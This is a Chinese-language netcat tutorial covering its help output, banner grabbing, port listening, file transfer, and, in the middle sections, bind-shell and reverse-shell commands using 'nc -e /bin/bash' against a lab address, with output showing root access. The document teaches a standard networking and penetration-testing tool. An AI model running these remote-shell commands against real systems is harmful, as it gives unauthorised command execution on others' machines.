Netcat——TCP/IP连接工具(瑞士军刀)
# nc -h
[v1.10-41.1]
connect to somewhere: nc [-options] hostname port[s] [ports] ...
listen for inbound: nc -l -p port [-options] [hostname] [port]
options:
-c shell commands as `-e'; use /bin/sh to exec [dangerous!!]
-e filename program to exec after connect [dangerous!!]
-b allow broadcasts
-g gateway source-routing hop point[s], up to 8
-G num source-routing pointer: 4, 8, 12, ...
-h this cruft
-i secs delay interval for lines sent, ports scanned
-k set keepalive option on socket
-l listen mode, for inbound connects
-n numeric-only IP addresses, no DNS
-o file hex dump of traffic
-p port local port number
-r randomize local and remote ports
-q secs quit after EOF on stdin and delay of secs
-s addr local source address
-T tos set Type Of Service
-t answer TELNET negotiation
-u UDP mode
-v verbose [use twice to be more verbose]
-w secs timeout for connects and final net reads
-C Send CRLF as line-ending
-z zero-I/O mode [used for scanning]
port numbers can be individual or ranges: lo-hi [inclusive];
hyphens in port names must be backslash escaped (e.g. 'ftp\-data').
nc的功能
- telnet / 获取系统 banner 信息
- 传输文本信息
- 传输文件和目录
- 加密传输文件
- 端口扫描
- 远程控制 / 正方向 shell
- 流媒体服务器
- 远程克隆硬盘
连接端口
~# nc -v 192.168.124.21 22
192.168.124.21 [192.168.124.21] 22 (ssh) open
SSH-2.0-OpenSSH_7.9p1 Debian-10
# nc -lvp 1234
# netstat -utnlp | grep 1234
tcp 0 0 0.0.0.0:1234 0.0.0.0:* LISTEN 2240/nc
- -l:表示监听。-v:表示详细输出。-p:指定端口号
开放式shell
- netcat的shell命令受理端功能,可以让所有能连接受理端端口的用户执行任意命令
# nc -lvp 1234 -e /bin/bash
listening on [any] 1234 ...
connect to [192.168.124.21] from 192.168.124.21 [192.168.124.21] 49362
# nc 192.168.124.21 1234
whoami
root
ls
公共
模板
视频
图片
文档
反弹式Shell
- 反弹式Shell,让受理端接入摸个准备发送命令的监听端进程
# nc -lvp 1234
listening on [any] 1234 ...
connect to [192.168.124.21] from 192.168.124.21 [192.168.124.21] 49364
# nc 192.168.124.21 1234 -e /bin/bash
whoami
ls
管道输出功能
- 使用 “<” 管道让Netcat吧接受的内容输出为文件
# nc -lvp 1234 > netcatfile
# nc 192.168.124.21 1234 < myfile
